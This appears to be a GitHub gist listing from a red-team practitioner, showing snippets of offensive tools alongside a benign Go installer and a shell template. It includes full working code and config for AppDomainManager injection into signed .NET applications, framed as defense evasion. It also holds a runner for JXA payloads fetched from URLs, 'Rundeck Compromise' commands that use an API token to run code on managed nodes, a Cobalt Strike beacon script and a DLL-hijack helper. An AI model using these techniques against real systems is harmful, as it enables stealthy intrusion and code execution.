@thesubtlety
thesubtlety / coalmine2.py
Created May 19, 2023 13:43 — forked from HackingLZ/coalmine2.py
coalmine2.py
#!/usr/bin/python3
import re
import zipfile
import argparse
from urllib.parse import urlparse
from colorama import Fore, Style, init
init()
@thesubtlety
thesubtlety / getgo.sh
Created January 5, 2023 20:15
Install go to home dir on debian
#!/bin/bash
# Install golang to home dir
set -euo pipefail
GO_INSTALL="$HOME/go"   # the tarball unpacks to a top-level go/ directory
GOUTIL="$HOME/.go"      # where the downloaded archive is kept
# go.dev/VERSION?m=text returns the version on line 1 (newer responses add a time line)
LATEST="$(curl -fsS 'https://go.dev/VERSION?m=text' | head -n1)"
DL_PKG="$LATEST.linux-amd64.tar.gz"
DL_URL="https://go.dev/dl/$DL_PKG"
mkdir -p "$GOUTIL"
wget -q -O "$GOUTIL/$DL_PKG" "$DL_URL"
# check the archive against the checksum published next to it before unpacking
EXPECTED="$(curl -fsS "$DL_URL.sha256" | awk '{print $1}')"
echo "$EXPECTED  $GOUTIL/$DL_PKG" | sha256sum -c -
# replace any previous toolchain; $HOME/go is also Go's default GOPATH, so set
# GOPATH to another directory if you keep a workspace there
rm -rf "$GO_INSTALL" && tar -C "$HOME" -xzf "$GOUTIL/$DL_PKG"
export PATH="$PATH:$GO_INSTALL/bin"
@thesubtlety
thesubtlety / template.sh
Created November 18, 2022 23:43
shell script template
#!/usr/bin/env bash
# https://sharats.me/posts/shell-script-best-practices/
set -o errexit
set -o nounset
set -o pipefail
if [[ "${TRACE-0}" == "1" ]]; then
set -o xtrace
fi
@thesubtlety
thesubtlety / jxarun.swift
Last active September 10, 2023 19:25
Run jxa from file http stdin
// adapted from cedowns jxa-runner
import Foundation
import Cocoa
import OSAKit
//Usage:
// for hosted .js JXA payloads:  ./JXARunner -u [url_to_jxa_payload]
// for local .js JXA payloads:   ./JXARunner -f [path_to_jxa_payload]
// for JXA code on stdin:        echo 'jxacode' | ./JXARunner -s
@thesubtlety
thesubtlety / jxarunner.m
Created September 30, 2022 18:15
Obj JXA runner
#import <Foundation/Foundation.h>
#import <AppKit/AppKit.h>
#import <CoreFoundation/CoreFoundation.h>
#import <OSAKit/OSAKit.h>
#import <Cocoa/Cocoa.h>
#import <OSAKit/OSALanguage.h>
#import <Foundation/NSString.h>
#include <string.h>
// build: clang -framework Foundation -framework Cocoa -framework OSAKit jxarunner.m -o jxarunner
// usage: ./jxarunner file.js
@thesubtlety
thesubtlety / _notes.md
Created April 25, 2022 14:53 — forked from djhohnstein/_notes.md
AppDomainManager Injection

Let's turn any .NET application into a LOLBin.

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed; they do this by matching the PE's Original Filename to the Process Name.

In this example, we don't have to rename anything. We simply coerce a trusted, signed app to load our assembly.

We do this by directing the application to read a config file we provide: the <app>.exe.config that the CLR reads from the application's directory at startup.
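As an added example (not part of the forked notes): a minimal AppDomainManager assembly together with the .config stanza that makes a .NET Framework host load it. The assembly name ManagerAsm, the type Inject.Manager and the log path are illustrative choices, not names from the original.

```csharp
// Inject.cs - build with the .NET Framework compiler (AppDomainManager is a
// .NET Framework / CLR 4 feature; .NET Core and .NET 5+ do not honour it):
//   csc.exe /target:library /out:ManagerAsm.dll Inject.cs
// Drop ManagerAsm.dll next to the signed target and add <target>.exe.config:
//
//   <?xml version="1.0" encoding="utf-8"?>
//   <configuration>
//     <runtime>
//       <!-- display name of our assembly; Version must match AssemblyVersion below -->
//       <appDomainManagerAssembly value="ManagerAsm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
//       <!-- fully qualified type that derives from System.AppDomainManager -->
//       <appDomainManagerType value="Inject.Manager" />
//     </runtime>
//   </configuration>
//
// The CLR resolves ManagerAsm through normal assembly binding (application base
// first), instantiates Inject.Manager and calls InitializeNewDomain before the
// host's Main runs. Nothing is renamed: the process image is still the signed
// executable; only its .config and a side-by-side DLL are ours.
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;

[assembly: AssemblyVersion("1.0.0.0")]

namespace Inject
{
    public sealed class Manager : AppDomainManager
    {
        // Called by the runtime for the default AppDomain at process start.
        public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
        {
            // Illustrative payload (assumed for this example): record which
            // signed host loaded us. It executes inside the trusted process.
            string host = Process.GetCurrentProcess().MainModule.FileName;
            File.AppendAllText(
                Path.Combine(Path.GetTempPath(), "adm.log"),
                DateTime.UtcNow.ToString("o") + " loaded by " + host + Environment.NewLine);
            base.InitializeNewDomain(appDomainInfo);
        }
    }
}
```

The same two values can be supplied without touching the config file through the documented APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environment variables (with COMPLUS_Version set to force CLR v4 on hosts that would otherwise pick v2). For detection, the tell is not the process name but the image load: an unsigned DLL from the application directory loaded into a signed .NET host shortly after a new <exe>.config appears beside it.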

@thesubtlety
thesubtlety / rundeck-commands.md
Created October 14, 2021 15:06
Rundeck Takeover Reference

Rundeck Compromise

Reference notes to run commands on nodes controlled by Rundeck given a valid API token.

RUNDECK="https://host"
TOKEN="x-rundeck-auth-token:<secret>"

# Identify projects
curl -s -H "$TOKEN" -H 'accept:application/json' "$RUNDECK/api/16/projects/" | jq .
@thesubtlety
thesubtlety / stalebacon.cna
Created March 26, 2021 21:59
Stale beacon slacker, only messages once
# CNA script to alert on dead beacons. Doesn't repeat messages.
# author: noah @thesubtlety
# credit https://github.com/bluscreenofjeff/AggressorScripts/blob/master/stale-beacon-notifier.cna - bluescreenofjeff
$webhook_url = "https://hooks.slack.com/services/xxxxx";
$slack_channel = "#crackers";
%beacon_status = %();
# default stale value of 5 minutes (300000ms)
$stale_value = 300000;
@thesubtlety
thesubtlety / natlas-docker-howto.md
Last active August 13, 2020 23:15
tl;dr natlas/docker install
@thesubtlety
thesubtlety / Get-Exports.ps1
Created February 12, 2020 17:59
DLL Hijack with exports
function Get-Exports {
<#
.SYNOPSIS
Get-Exports fetches DLL exports and optionally provides
C++ wrapper output (identical to ExportsToC++ but without
needing VS and a compiled binary). To do this it reads the DLL
bytes into memory and then parses them (no LoadLibraryEx).
Because of this you can parse x86/x64 DLLs regardless of
the bitness of PowerShell.